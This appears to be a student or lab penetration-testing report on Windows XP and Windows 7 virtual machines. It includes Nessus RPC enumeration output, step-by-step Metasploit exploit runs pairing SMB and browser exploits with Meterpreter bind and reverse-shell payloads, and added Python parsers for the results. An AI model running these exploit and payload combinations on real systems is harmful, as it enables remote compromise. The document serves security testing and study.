Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0

Description : Unknown RPC service

Annotation : AppInfo

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Local RPC service

Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Local RPC service

Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0

Description : Unknown RPC service

Annotation : IKE/Authip API

Type : Local RPC service

Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0

Description : Unknown RPC service

Annotation : Event log TCPIP

Type : Local RPC service

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC service

Annotation : NRP server endpoint

Type : Local RPC service

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC service

Annotation : NRP server endpoint 

Type : Local RPC service

Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0

Description : Unknown RPC service

Annotation : NRP server endpoint 

Type : Local RPC service

Named pipe : Audiosrv

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint 

Type : Local RPC service

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint 

Type : Local RPC service

Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint 

Type : Local RPC service

Named pipe : Audiosrv

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0

Description : DHCP Client Service

Windows process : svchost.exe

Annotation : DHCP Client LRPC Endpoint

Type : Local RPC service

Named pipe : dhcpcsvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Local RPC service

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Local RPC service

Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Local RPC service

Named pipe : Audiosrv

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint 

Type : Local RPC service

Named pipe : dhcpcsvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0

Description : Unknown RPC service

Annotation : DHCPv6 Client LRPC Endpoint

Type : Local RPC service

Named pipe : dhcpcsvc6

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : Audiosrv

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : dhcpcsvc

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : dhcpcsvc6

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

Description : Unknown RPC service

Annotation : Security Center

Type : Local RPC service

Named pipe : OLEE4C5DBF62E0E4163A84295240E81

Nessus ID : 10736 

Port rtsp (554/tcp) 

Port icslap (2869/tcp) 

Port netbios-ssn (139/tcp) 

SMB Detection 

Synopsis : 

A file / print sharing service is listening on the remote host.

Description : 

The remote service understands the CIFS (Common Internet File System)

or Server Message Block (SMB) protocol, used to provide shared access

to files, printers, etc between nodes on a network.

Solution : 

n/a

Risk factor : 

None

Plugin output : 

An SMB server is running on this port.

Nessus ID : 11011 

Port unknown (49299/tcp) 

DCE Services Enumeration 

Synopsis : 

A DCE/RPC service is running on the remote host.

Description : 

By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the

Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to

connect and bind to each service by sending an RPC request to the remote port/pipe.

Solution : 

N/A

Risk factor : 

None

Plugin output : 

The following DCERPC services are available on TCP port 49299 :

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0

Description : IPsec Services (Windows XP & 2003)

Windows process : lsass.exe

Annotation : IPSec Policy agent endpoint 

Type : Remote RPC service

TCP Port : 49299

IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000

UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0

Description : Unknown RPC service

Annotation : Remote Fw APIs

Type : Remote RPC service

TCP Port : 49299

IP : 192.168.0.171

Nessus ID : 10736 
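The plugin output above is a list of endpoint records, and the part a defender needs out of it is which interfaces are reachable over the network (a Remote RPC service with a TCP port) as opposed to local-only named pipes, and which interface UUIDs Nessus could not identify ("Unknown RPC service") and therefore have to be identified by hand. The parser below is an added example and is not part of this report or of Nessus; it reads the record layout shown above from a sample constructed out of three of the endpoints listed in this report and groups them by exposure.

```python
"""Parse Nessus 'DCE Services Enumeration' (plugin 10736) output and group the
DCE/RPC endpoints it lists by how they can be reached."""
import re

# Constructed sample in the record layout the plugin prints, using three
# endpoints that appear in this report: two remote endpoints on TCP 49299
# and one local (LRPC named pipe) endpoint.
SAMPLE_PLUGIN_OUTPUT = """\
The following DCERPC services are available on TCP port 49299 :

Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0
Description : IPsec Services (Windows XP & 2003)
Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0
Description : Unknown RPC service
Annotation : Remote Fw APIs
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc

Nessus ID : 10736
"""

FIELD_RE = re.compile(
    r"^(Object UUID|UUID|Description|Windows process|Annotation|Type|TCP Port|IP|Named pipe)"
    r"\s*:\s*(.*?)\s*$")
UUID_RE = re.compile(r"^([0-9a-f-]{36}),\s*version\s+([\d.]+)$", re.I)


def parse_dce_endpoints(text):
    """Return one dict per endpoint record. A record starts at each 'Object UUID'
    line; every other 'Key : value' line is stored on the current record.
    Lines outside the known field set (the banner, 'Nessus ID') are ignored."""
    records, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue
        key, value = m.groups()
        if key == "Object UUID":
            current = {"object_uuid": value}
            records.append(current)
        elif current is None:
            continue
        elif key == "UUID":
            um = UUID_RE.match(value)
            current["uuid"] = um.group(1).lower() if um else value
            current["version"] = um.group(2) if um else None
        elif key == "TCP Port":
            current["tcp_port"] = int(value)
        else:
            current[key.lower().replace(" ", "_")] = value
    return records


def triage(records):
    """Group endpoints by exposure. Remote endpoints are reachable from the
    network; local ones only through an LRPC named pipe. 'Unknown RPC service'
    means Nessus had no name for the interface UUID, so it needs identifying by hand."""
    remote = [r for r in records if r.get("type", "").startswith("Remote")]
    local = [r for r in records if r.get("type", "").startswith("Local")]
    unknown = [r for r in records if r.get("description", "").lower().startswith("unknown")]
    return {
        "remote_ports": sorted({(r.get("ip"), r.get("tcp_port")) for r in remote}),
        "remote_interfaces": sorted({r["uuid"] for r in remote}),
        "local_pipes": sorted({r.get("named_pipe") for r in local}),
        "unknown_interfaces": sorted({r["uuid"] for r in unknown}),
    }


if __name__ == "__main__":
    endpoints = parse_dce_endpoints(SAMPLE_PLUGIN_OUTPUT)
    for k, v in triage(endpoints).items():
        print(f"{k}: {v}")
```

Run against a full Nessus report, the `remote_ports` list is the set of RPC listeners that a host firewall rule or a portmapper restriction would have to cover, and `unknown_interfaces` is the list to resolve before signing off on the host.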

PENETRATION TESTING (METASPLOIT)

Metasploit, specifically the Metasploit Framework, is an open-source tool used for penetration testing and signature development. The tool presents nearly endless combinations of exploits and payloads that can be used to test multiple aspects of a remote machine's security. As such, it was used to test penetrable points in both the Windows XP and Windows 7 virtual machines. This was done using the following combinations of exploits and payloads.

The exploit and payload information was taken from the information dialogs provided within Metasploit 3.3. Following the exploit and payload information are the test results from the remote host testing. Six tests were performed on each virtual machine, and the test process is detailed. For complete installation and setup of Metasploit, refer to the Vantage Point Computing Policy Document.

EXPLOITS

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

Command: msf > windows/smb/ms08_067_netapi

Version: 5888

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Payload information:

Space: 400

Avoid: 8 characters

Description:

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

Command: msf > windows/browser/ms06_071_xml_core

Version: 5773

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Payload information:

Space: 1024

Avoid: 1 character

Description:

This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2.

References:

http://www.microsoft.com/technet/security/bulletin/MS06-071.mspx

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5745

http://www.securityfocus.com/bid/20915

http://www.osvdb.org/29425

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

Command: msf > windows/browser/ms06_001_wmf_setabortproc

Version: 7611

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Payload information:

Space: 1040

Avoid: 1 characters

Description:

This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560

http://www.osvdb.org/21987

http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx

http://www.securityfocus.com/bid/16074

http://www.microsoft.com/technet/security/advisory/912840.mspx

http://wvware.sourceforge.net/caolan/ora-wmf.html

http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt 

PAYLOADS

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

Command: msf> windows/meterpreter/bind_tcp

Version: 7075, $Revision$, 7546

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 298

Description:

Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

Command: msf> windows/meterpreter/reverse_tcp

Version: 7217, $Revision$, 7546

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 290

Description:

Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload

WINDOWS XP

TEST 1

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

TEST 2

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set lhost 192.168.0.166

lhost => 192.168.0.166

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (NX)

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

TEST 3

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms06_071_xml_core) > exploit 

[*] Exploit running as background job.

[*] Started bind handler

[*] Using URL: http://0.0.0.0:8080/Ylyb4Hd

[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd

[*] Server started.

TEST 4

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/browser/ms06_071_xml_core

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms06_071_xml_core) > set lhost 192.168.0.166

lhost => 192.168.0.166

msf exploit(ms06_071_xml_core) > exploit 

[*] Exploit running as background job.

[*] Started reverse handler

[*] Using URL: http://0.0.0.0:8080/VCk957jpkpSW6J3

[*] Local IP: http://192.168.0.196:8080/VCk957jpkpSW6J3

[*] Server started.

TEST 5

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms06_001_wmf_setabortproc) > exploit 

[*] Exploit running as background job.

msf exploit(ms06_001_wmf_setabortproc) >

[*] Started bind handler

[*] Using URL: http://0.0.0.0:8080/I0R0jq7Efcxn08

[*] Local IP: http://192.168.0.196:8080/I0R0jq7Efcxn08

[*] Server started.

TEST 6

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166

rhost => 192.168.0.166

msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.166

lhost => 192.168.0.166

msf exploit(ms06_001_wmf_setabortproc) > exploit 

[*] Exploit running as background job.

msf exploit(ms06_001_wmf_setabortproc) >

[*] Using URL: http://0.0.0.0:8080/c5wMfJ8gXdTk 

[*] Started reverse handler on port 4444

[*] Local IP: http://192.168.0.196:8080/c5wMfJ8gXdTk

[*] Server started.

WINDOWS 7

TEST 1

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bindtcp

[-] The value specified for payload is not valid.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown

[*] Could not determine the exact language pack 

[*] Exploit completed, but no session was created.

TEST 2

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set lhost 192.168.0.171

lhost => 192.168.0.171

msf exploit(ms08_067_netapi) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on port 4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown

[*] Could not determine the exact language pack

[*] Exploit completed, but no session was created.

TEST 3

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf > use windows/browser/ms06_071_xml_core

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms06_071_xml_core) > exploit 

[*] Exploit running as background job.

msf exploit(ms06_071_xml_core) > [*] Started bind handler

[*] Using URL: http://0.0.0.0:8080/H2MNFt9yRjH4N0q

[*] Local IP: http://192.168.0.196:8080/H2MNFt9yRjH4N0q

[*] Server started.

TEST 4

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/browser/ms06_071_xml_core

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms06_071_xml_core) > set lhost 192.168.0.171

lhost => 192.168.0.171

msf exploit(ms06_071_xml_core) > exploit

[*] Exploit running as background job.

msf exploit(ms06_071_xml_core) > [*] Started reverse handler on port 4444

[*] Using URL: http://0.0.0.0:8080/m8MRYtwpxBsaeP

[*] Local IP: http://192.168.0.196:8080/m8MRYtwpxBsaeP

[*] Server started.

TEST 5

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms06_001_wmf_setabortproc) > exploit 

[*] Exploit running as background job.

msf exploit(ms06_001_wmf_setabortproc) >

[*] Started bind handler

[*] Using URL: http://0.0.0.0:8080/LJTnPF9ZUf 

[*] Local IP: http://192.168.0.196:8080/LJTnPF9ZUf 

[*] Server started.

[*] Started bind handler

[*] Sending exploit to 192.168.0.196:1199...

[*] Sending stage (719360 bytes)

[*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)

TEST 6

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

msf > use windows/browser/ms06_001_wmf_setabortproc

msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171

rhost => 192.168.0.171

msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.171

lhost => 192.168.0.171

msf exploit(ms06_001_wmf_setabortproc) > exploit 

[*] Exploit running as background job.

msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444

[*] Using URL: http://0.0.0.0:8080/JfNUisgBdnRRa

[*] Local IP: http://192.168.0.196:8080/JfNUisgBdnRRa

[*] Server started.

[*] Sending exploit to 192.168.0.196:1267...
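Reading twelve transcripts like the ones above by hand invites mistakes, so here is an added summarizer (example code, not part of this report or of Metasploit) that turns each TEST block into one record of module, payload, configured rhost and the outcome the log actually shows. It distinguishes the three endings visible in these transcripts: "Exploit completed, but no session was created" (no code execution), "Server started." (a browser-exploit listener is up but no client has connected yet) and "Meterpreter session N opened" (a payload ran). For the last case it also records whether the session's peer address equals the configured rhost, which is the check to make before reading a session as evidence that the target host was the one compromised. The sample transcript is constructed from three of the tests shown above, trimmed to the lines the parser uses.

```python
"""Summarize msfconsole transcripts into one record per test: module, payload,
configured target and the outcome the log actually shows."""
import re

# Constructed sample: three of the report's transcripts, trimmed to the lines
# the summarizer relies on (TEST headings as used in the report).
SAMPLE_TRANSCRIPT = """\
TEST 1
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.166
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Exploit completed, but no session was created.
TEST 3
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd
[*] Server started.
TEST 5
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
[*] Server started.
[*] Sending exploit to 192.168.0.196:1199...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)
"""

TEST_RE = re.compile(r"^TEST\s+(\d+)$", re.I)
USE_RE = re.compile(r"^msf\s*>\s*use\s+(\S+)")
SET_RE = re.compile(r"^msf exploit\(\S+\)\s*>\s*set\s+(\w+)\s+(\S+)")
SESSION_RE = re.compile(r"Meterpreter session (\d+) opened \((\S+) -> (\S+)\)")


def parse_msf_transcript(text):
    """Cut the transcript at each TEST heading and collect, per test, the module
    selected with 'use', the options given to 'set' and the [*]/[-] console events."""
    tests, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if m := TEST_RE.match(line):
            cur = {"test": int(m.group(1)), "module": None, "options": {},
                   "events": [], "session": None}
            tests.append(cur)
        elif cur is None:
            continue
        elif m := USE_RE.match(line):
            cur["module"] = m.group(1)
        elif m := SET_RE.match(line):
            cur["options"][m.group(1).lower()] = m.group(2)
        elif line[:3] in ("[*]", "[-]"):
            cur["events"].append(line[3:].strip())
            if m := SESSION_RE.search(line):
                cur["session"] = {"id": int(m.group(1)), "local": m.group(2), "peer": m.group(3)}
    return tests


def classify_outcome(test):
    """Only a 'Meterpreter session N opened' line shows that a payload ran.
    'Server started.' means a browser-exploit listener is waiting for a client."""
    if test["session"]:
        return "session_opened"
    if any(e.startswith("Exploit completed, but no session was created") for e in test["events"]):
        return "no_session"
    if any(e.startswith("Server started") for e in test["events"]):
        return "listener_waiting"
    return "unknown"


def summarize(tests):
    """One flat row per test; peer_is_target is None when no session was opened."""
    rows = []
    for t in tests:
        rhost = t["options"].get("rhost")
        peer_ip = t["session"]["peer"].rsplit(":", 1)[0] if t["session"] else None
        rows.append({
            "test": t["test"],
            "module": t["module"],
            "payload": t["options"].get("payload"),
            "rhost": rhost,
            "outcome": classify_outcome(t),
            # a session is evidence against the target only if its peer is the target
            "peer_is_target": None if peer_ip is None else peer_ip == rhost,
        })
    return rows


if __name__ == "__main__":
    for row in summarize(parse_msf_transcript(SAMPLE_TRANSCRIPT)):
        print(row)
```

In the sample, the session line from Windows 7 Test 5 gives a peer of 192.168.0.196 while rhost was set to 192.168.0.171, so `peer_is_target` comes out False: the session came from the Metasploit host itself, not from the target.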

CONCLUSION

As with any scientific test, empirical evidence must be presented in order to draw legitimate conclusions. In addition, test results must be corroborated in order to verify their authenticity. This is the reason that multiple tools were used to test the security of the two remote machines (the virtual machines). While NMap, Nessus, and Metasploit have different specialties, they are all necessary pieces of a larger puzzle: computer security.

In order to fully verify true security, the tools must be considered together. For instance, basing results strictly on NMap scans would yield the conclusion that Windows XP is far more secure than Windows 7, because Windows XP has no unfiltered ports and Windows 7 has seven "open ports." However, the Nessus scan concludes that Windows XP has five open ports and Windows 7 has twelve. Additionally, there are multiple low vulnerabilities present in each operating system.

The vulnerabilities present in each operating system have the same underlying processes: Server Message Block (SMB) and Distributed Computing Environment (DCE). SMB is an application-layer protocol that provides shared access to computing resources like files, printers, and ports. Reduced to the most basic level, it functions as the "Microsoft Windows Network." DCE is a software system that functions as a framework for client/server interactions. The most pertinent aspect is the remote procedure call system, which allows work to be performed across multiple computers.

While both of these processes present issues, the important thing to consider is their presence in the operating systems. These vulnerabilities are not limited to one particular version of the Windows operating system (though Windows 7 does have more low-priority vulnerabilities); they are present in both of them. These vulnerabilities exist below the level of ordinary user interaction, so they remain invisible to most users.

This is what makes them the most dangerous type of vulnerability: they require no user configuration beyond the out-of-the-box installation to compromise the system. By contrast, installing iTunes, Winamp, or MediaMonkey will make the system vulnerable in certain ways, but users sign up for those vulnerabilities when they install the programs. Because of this, Metasploit exploit and payload combinations were chosen that target vulnerabilities related to base-level functionality like SMB, DCE, and TCP networking.

